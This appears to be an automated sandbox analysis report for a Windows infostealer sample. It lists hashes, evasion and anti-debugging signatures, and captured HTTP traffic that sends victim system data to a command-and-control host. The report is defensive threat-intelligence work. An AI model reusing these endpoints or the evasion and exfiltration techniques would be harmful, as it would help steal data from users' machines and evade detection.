Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
f9bcOz8SxR.exe

Overview

General Information

Sample name:f9bcOz8SxR.exe
renamed because original name is a hash value
Original sample name:1d057672840921889505863b33e87671.exe
Analysis ID:1578919
MD5:1d057672840921889505863b33e87671
SHA1:3bbc68098e4080f656c7f92147a54d05d18e1277
SHA256:e4420b07cff76b9f623b1e9ed3957d708769a744f245e27fb3b1e44cdc67eb35
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • f9bcOz8SxR.exe (PID: 3668 cmdline: "C:\Users\user\Desktop\f9bcOz8SxR.exe" MD5: 1D057672840921889505863B33E87671)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: f9bcOz8SxR.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: f9bcOz8SxR.exeVirustotal: Detection: 50%Perma Link
Source: f9bcOz8SxR.exeReversingLabs: Detection: 68%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: f9bcOz8SxR.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: -----BEGIN PUBLIC KEY-----0_2_008ADCF0
Source: f9bcOz8SxR.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_008EA5B0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_008EB560
Source: f9bcOz8SxR.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0088255D
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_008829FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 565156Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 32 34 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 565156Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 32 34 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0094A8C0 recvfrom,0_2_0094A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 565156Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 32 34 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WE
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: f9bcOz8SxR.exe, 00000000.00000002.2633217403.00000000015F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: f9bcOz8SxR.exe, 00000000.00000003.2620415267.00000000015F2000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2620438543.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633217403.00000000015F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN17343663225a1
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: f9bcOz8SxR.exe, 00000000.00000003.2619927934.0000000001667000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619689608.0000000001661000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619620366.0000000001658000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2619184023.0000000001654000.00000004.00000020.00020000.00000000.sdmp, f9bcOz8SxR.exe, 00000000.00000002.2633653374.0000000001668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEelf.
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: f9bcOz8SxR.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: f9bcOz8SxR.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: f9bcOz8SxR.exe, f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: f9bcOz8SxR.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: f9bcOz8SxR.exe, 00000000.00000002.2623343167.0000000000D30000.00000040.00000001.01000000.00000003.sdmp, f9bcOz8SxR.exe, 00000000.00000003.2201302548.000000000717F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714

System Summary

barindex
PE file contains section with special chars
Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: f9bcOz8SxR.exeStatic PE information: section name: .idata
Source: f9bcOz8SxR.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008905B00_2_008905B0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00896FA00_2_00896FA0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0094B1800_2_0094B180
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008BF1000_2_008BF100
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_009500E00_2_009500E0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C0E0300_2_00C0E030
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008E62100_2_008E6210
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0094C3200_2_0094C320
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BD44100_2_00BD4410
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_009504200_2_00950420
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088E6200_2_0088E620
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C047800_2_00C04780
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008EA7F00_2_008EA7F0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BE67300_2_00BE6730
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0094C7700_2_0094C770
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0093C9000_2_0093C900
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008949400_2_00894940
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088A9600_2_0088A960
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00A56AC00_2_00A56AC0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00B3AAC00_2_00B3AAC0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0088CBB00_2_0088CBB0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BF8BF00_2_00BF8BF0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00B3AB2C0_2_00B3AB2C
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00A14B600_2_00A14B60
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C0CC700_2_00C0CC70
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BFCD800_2_00BFCD80
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C04D400_2_00C04D40
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00B9AE300_2_00B9AE30
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_0094EF900_2_0094EF90
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00948F900_2_00948F90
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BD2F900_2_00BD2F90
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008A4F700_2_008A4F70
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_008910E60_2_008910E6
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BED4300_2_00BED430
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BF35B00_2_00BF35B0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BD56D00_2_00BD56D0
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00C117800_2_00C11780
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_009398800_2_00939880
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeCode function: 0_2_00BD99200_2_00BD9920
